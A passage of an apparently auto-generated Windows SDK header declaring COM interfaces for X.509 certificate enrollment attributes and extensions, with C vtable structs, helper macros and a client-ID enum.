            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509ExtensionMSApplicationPolicies * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509ExtensionMSApplicationPolicies * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in IX509ExtensionMSApplicationPolicies * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509ExtensionMSApplicationPolicies * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Critical )( 
            __RPC__in IX509ExtensionMSApplicationPolicies * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Critical )( 
            __RPC__in IX509ExtensionMSApplicationPolicies * This,
            /* [in] */ VARIANT_BOOL Value);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeEncode )( 
            __RPC__in IX509ExtensionMSApplicationPolicies * This,
            /* [in] */ __RPC__in_opt ICertificatePolicies *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509ExtensionMSApplicationPolicies * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Policies )( 
            __RPC__in IX509ExtensionMSApplicationPolicies * This,
            /* [retval][out] */ __RPC__deref_out_opt ICertificatePolicies **ppValue);
        
        END_INTERFACE
    } IX509ExtensionMSApplicationPoliciesVtbl;

    interface IX509ExtensionMSApplicationPolicies
    {
        CONST_VTBL struct IX509ExtensionMSApplicationPoliciesVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509ExtensionMSApplicationPolicies_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509ExtensionMSApplicationPolicies_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509ExtensionMSApplicationPolicies_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509ExtensionMSApplicationPolicies_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509ExtensionMSApplicationPolicies_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509ExtensionMSApplicationPolicies_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509ExtensionMSApplicationPolicies_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509ExtensionMSApplicationPolicies_Initialize(This,pObjectId,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> Initialize(This,pObjectId,Encoding,strEncodedData) ) 

#define IX509ExtensionMSApplicationPolicies_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define IX509ExtensionMSApplicationPolicies_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define IX509ExtensionMSApplicationPolicies_get_Critical(This,pValue)	\
    ( (This)->lpVtbl -> get_Critical(This,pValue) ) 

#define IX509ExtensionMSApplicationPolicies_put_Critical(This,Value)	\
    ( (This)->lpVtbl -> put_Critical(This,Value) ) 


#define IX509ExtensionMSApplicationPolicies_InitializeEncode(This,pValue)	\
    ( (This)->lpVtbl -> InitializeEncode(This,pValue) ) 

#define IX509ExtensionMSApplicationPolicies_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define IX509ExtensionMSApplicationPolicies_get_Policies(This,ppValue)	\
    ( (This)->lpVtbl -> get_Policies(This,ppValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509ExtensionMSApplicationPolicies_INTERFACE_DEFINED__ */


#ifndef __IX509Attribute_INTERFACE_DEFINED__
#define __IX509Attribute_INTERFACE_DEFINED__

/* interface IX509Attribute */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509Attribute;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab322-217d-11da-b2a4-000e7bbb2b09")
    IX509Attribute : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ObjectId( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_RawData( 
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509AttributeVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509Attribute * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509Attribute * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509Attribute * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509Attribute * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509Attribute * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509Attribute * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509Attribute * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509Attribute * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in IX509Attribute * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509Attribute * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } IX509AttributeVtbl;

    interface IX509Attribute
    {
        CONST_VTBL struct IX509AttributeVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509Attribute_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509Attribute_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509Attribute_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509Attribute_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509Attribute_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509Attribute_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509Attribute_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509Attribute_Initialize(This,pObjectId,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> Initialize(This,pObjectId,Encoding,strEncodedData) ) 

#define IX509Attribute_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define IX509Attribute_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509Attribute_INTERFACE_DEFINED__ */


#ifndef __IX509Attributes_INTERFACE_DEFINED__
#define __IX509Attributes_INTERFACE_DEFINED__

/* interface IX509Attributes */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509Attributes;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab323-217d-11da-b2a4-000e7bbb2b09")
    IX509Attributes : public IDispatch
    {
    public:
        virtual /* [helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get_ItemByIndex( 
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt IX509Attribute **pVal) = 0;
        
        virtual /* [helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get_Count( 
            /* [retval][out] */ __RPC__out long *pVal) = 0;
        
        virtual /* [restricted][helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get__NewEnum( 
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Add( 
            /* [in] */ __RPC__in_opt IX509Attribute *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Remove( 
            /* [in] */ LONG Index) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Clear( void) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509AttributesVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509Attributes * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509Attributes * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509Attributes * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509Attributes * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509Attributes * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509Attributes * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509Attributes * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByIndex )( 
            __RPC__in IX509Attributes * This,
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt IX509Attribute **pVal);
        
        /* [helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Count )( 
            __RPC__in IX509Attributes * This,
            /* [retval][out] */ __RPC__out long *pVal);
        
        /* [restricted][helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get__NewEnum )( 
            __RPC__in IX509Attributes * This,
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Add )( 
            __RPC__in IX509Attributes * This,
            /* [in] */ __RPC__in_opt IX509Attribute *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Remove )( 
            __RPC__in IX509Attributes * This,
            /* [in] */ LONG Index);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Clear )( 
            __RPC__in IX509Attributes * This);
        
        END_INTERFACE
    } IX509AttributesVtbl;

    interface IX509Attributes
    {
        CONST_VTBL struct IX509AttributesVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509Attributes_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509Attributes_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509Attributes_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509Attributes_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509Attributes_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509Attributes_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509Attributes_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509Attributes_get_ItemByIndex(This,Index,pVal)	\
    ( (This)->lpVtbl -> get_ItemByIndex(This,Index,pVal) ) 

#define IX509Attributes_get_Count(This,pVal)	\
    ( (This)->lpVtbl -> get_Count(This,pVal) ) 

#define IX509Attributes_get__NewEnum(This,pVal)	\
    ( (This)->lpVtbl -> get__NewEnum(This,pVal) ) 

#define IX509Attributes_Add(This,pVal)	\
    ( (This)->lpVtbl -> Add(This,pVal) ) 

#define IX509Attributes_Remove(This,Index)	\
    ( (This)->lpVtbl -> Remove(This,Index) ) 

#define IX509Attributes_Clear(This)	\
    ( (This)->lpVtbl -> Clear(This) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509Attributes_INTERFACE_DEFINED__ */


#ifndef __IX509AttributeExtensions_INTERFACE_DEFINED__
#define __IX509AttributeExtensions_INTERFACE_DEFINED__

/* interface IX509AttributeExtensions */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509AttributeExtensions;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab324-217d-11da-b2a4-000e7bbb2b09")
    IX509AttributeExtensions : public IX509Attribute
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeEncode( 
            /* [in] */ __RPC__in_opt IX509Extensions *pExtensions) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeDecode( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_X509Extensions( 
            /* [retval][out] */ __RPC__deref_out_opt IX509Extensions **ppValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509AttributeExtensionsVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509AttributeExtensions * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509AttributeExtensions * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509AttributeExtensions * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509AttributeExtensions * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509AttributeExtensions * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509AttributeExtensions * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509AttributeExtensions * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509AttributeExtensions * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in IX509AttributeExtensions * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509AttributeExtensions * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeEncode )( 
            __RPC__in IX509AttributeExtensions * This,
            /* [in] */ __RPC__in_opt IX509Extensions *pExtensions);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509AttributeExtensions * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_X509Extensions )( 
            __RPC__in IX509AttributeExtensions * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509Extensions **ppValue);
        
        END_INTERFACE
    } IX509AttributeExtensionsVtbl;

    interface IX509AttributeExtensions
    {
        CONST_VTBL struct IX509AttributeExtensionsVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509AttributeExtensions_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509AttributeExtensions_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509AttributeExtensions_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509AttributeExtensions_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509AttributeExtensions_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509AttributeExtensions_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509AttributeExtensions_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509AttributeExtensions_Initialize(This,pObjectId,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> Initialize(This,pObjectId,Encoding,strEncodedData) ) 

#define IX509AttributeExtensions_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define IX509AttributeExtensions_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 


#define IX509AttributeExtensions_InitializeEncode(This,pExtensions)	\
    ( (This)->lpVtbl -> InitializeEncode(This,pExtensions) ) 

#define IX509AttributeExtensions_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define IX509AttributeExtensions_get_X509Extensions(This,ppValue)	\
    ( (This)->lpVtbl -> get_X509Extensions(This,ppValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509AttributeExtensions_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0040 */
/* [local] */ 

typedef 
enum RequestClientInfoClientId
    {
        ClientIdNone	= 0,
        ClientIdXEnroll2003	= 1,
        ClientIdAutoEnroll2003	= 2,
        ClientIdWizard2003	= 3,
        ClientIdCertReq2003	= 4,
        ClientIdDefaultRequest	= 5,
        ClientIdAutoEnroll	= 6,
        ClientIdRequestWizard	= 7,
        ClientIdEOBO	= 8,
        ClientIdCertReq	= 9,
        ClientIdTest	= 10,
        ClientIdWinRT	= 11,
        ClientIdUserStart	= 1000
    } 	RequestClientInfoClientId;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0040_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0040_v0_0_s_ifspec;

#ifndef __IX509AttributeClientId_INTERFACE_DEFINED__
#define __IX509AttributeClientId_INTERFACE_DEFINED__

/* interface IX509AttributeClientId */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509AttributeClientId;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab325-217d-11da-b2a4-000e7bbb2b09")
    IX509AttributeClientId : public IX509Attribute
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeEncode( 
            /* [in] */ RequestClientInfoClientId ClientId,
            /* [in] */ __RPC__in BSTR strMachineDnsName,
            /* [in] */ __RPC__in BSTR strUserSamName,
            /* [in] */ __RPC__in BSTR strProcessName) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeDecode( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ClientId( 
            /* [retval][out] */ __RPC__out RequestClientInfoClientId *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_MachineDnsName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_UserSamName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ProcessName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509AttributeClientIdVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509AttributeClientId * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509AttributeClientId * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509AttributeClientId * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509AttributeClientId * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509AttributeClientId * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509AttributeClientId * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509AttributeClientId * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509AttributeClientId * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in IX509AttributeClientId * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509AttributeClientId * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeEncode )( 
            __RPC__in IX509AttributeClientId * This,
            /* [in] */ RequestClientInfoClientId ClientId,
            /* [in] */ __RPC__in BSTR strMachineDnsName,
            /* [in] */ __RPC__in BSTR strUserSamName,
            /* [in] */ __RPC__in BSTR strProcessName);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509AttributeClientId * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ClientId )( 
            __RPC__in IX509AttributeClientId * This,
            /* [retval][out] */ __RPC__out RequestClientInfoClientId *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_MachineDnsName )( 
            __RPC__in IX509AttributeClientId * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
